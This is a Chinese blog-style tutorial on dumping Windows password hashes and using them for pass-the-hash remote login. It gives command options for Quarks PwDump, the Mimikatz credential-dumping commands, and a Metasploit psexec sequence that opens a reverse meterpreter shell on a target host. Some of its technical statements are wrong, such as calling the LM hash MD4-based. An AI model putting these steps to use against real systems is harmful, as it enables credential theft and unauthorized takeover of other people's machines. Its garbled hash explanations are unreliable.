WINDOWS 窃取hash实现远程登录

目录

前言

一、Windows常用用户

二、Windows密码安全

1. Quarks PwDump

 参数:

2.  SAMInside

3、Mimikatz

总结


前言

Windows哈希分为两组:LMhash和NTLMhash

例如:

user:501:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71

#内容的构成:
username : unique_identifier : LMhash : NThash

LMhash用于存储密码。

在W7及以上版本中LM是禁用的; 但是,当密码少于15个字符的时候,就在内存中启用LM。 这也是为什么管理员帐户的所有建议都是15个字符的原因。

LMhash已经过时了,它基于MD4,很容易破解。 它之所以依旧使用MD4,是因为Windows域需要较快的解密速度,同时这也使得它的安全性变得很差。

NThash根据用户输入的整个密码计算哈希值。

LMhash将密码拆分为两个7个字符的块,如果有缺省则进行填充。


NTLMhash用于域中主机上的本地身份验证。 如上所示,它是由LMhash和NThash组合而成。

NTLMhash与明文凭证效果是一样的。因此如果你无法获取明文凭据的时候,就可以通过哈希传递来通过身份验证,而不需要明文密码本身。



一、Windows常用用户

SYSTEM:               #本地机器上拥有最高权限的用户。
Administrator:        #本地机器上拥有最高权限的用户。
Guest:                   # 只拥有相对较少的权限,默认被禁用。


二、Windows密码安全


1. Quarks PwDump

Quarks PwDump 是一个Win32环境下的系统授权信息导出工具,目前除此之外没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,且相当稳定。

它目前可以导出 :

Local accounts NT/LM hashes + history       #本机NT/LM哈希+历史登录记录

Domain accounts NT/LM hashes + history   #域中的NT/LM哈希+历史登录记录

Cached domain password                            #缓存中的域管理密码


 参数:

quarks-pwdump.exe <options>
Options :
-dhl  --dump-hash-local
-dhdc --dump-hash-domain-cached
-dhd  --dump-hash-domain (NTDS_FILE must be specified)
-db   --dump-bitlocker (NTDS_FILE must be specified)
-nt   --ntds-file FILE
-hist --with-history (optional)
-t    --output-type JOHN/LC (optional, if no=>JOHN)
-o    --output FILE (optional, if no=>stdout)

Example: quarks-pwdump.exe --dump-hash-domain --with-history

2.  SAMInside

SAMInside为一款俄罗斯出品的Windows密码恢复软件,支持Windows NT/2000/XP/Vista操作系统,主要用来恢复Windows的用户登录密码。

使用说明:

导入本地系统和文件,当然,也可以从项目文件、文件导入,注意SAM文件是系统的SAM文件,一般在C:\WINDOWS\system32\config路径下。

 

按快捷键“F4”,视密码复杂程度、密码长度和机器性能,有时很快就等到结果;

如果时间过长,还可以暂停,保存破解状态留待下次接着运行。

3、Mimikatz

渗透测试常用工具,法国一个牛人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。

 使用说明:

privilege::debug                  //提升权限
sekurlsa::logonpasswords  //抓取密码

这个软件一个是对应32位系统的,一个是64位系统的,所以要先知道系统的属性,不然抓不到信息。

标明了“x64”,如果没有标明则说明您的电脑是32位的

同时需要以管理员权限运行,不然抓hash的时候会提示权限不足。

 

三、利用Hash远程登录系统

 利用获取到的hash:

aad3b435b51404eeaad3b435b51404ee:23a5c2470683a8b5375e9e30868b6412

打开metasploit

use exploit/windows/smb/psexec
 
set SMBUser username
 
set SMBPass 用户密码的hash值
 
set payload Windows/meterpreter/reverse_tcp
 
set rhost 要进行登录的主机ip
 
set lhost 本机ip
 
exploit



总结

多数借鉴网络上的文章形成一个自己的观点,因为水平不佳,还未入门有很多的不足,望指点。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值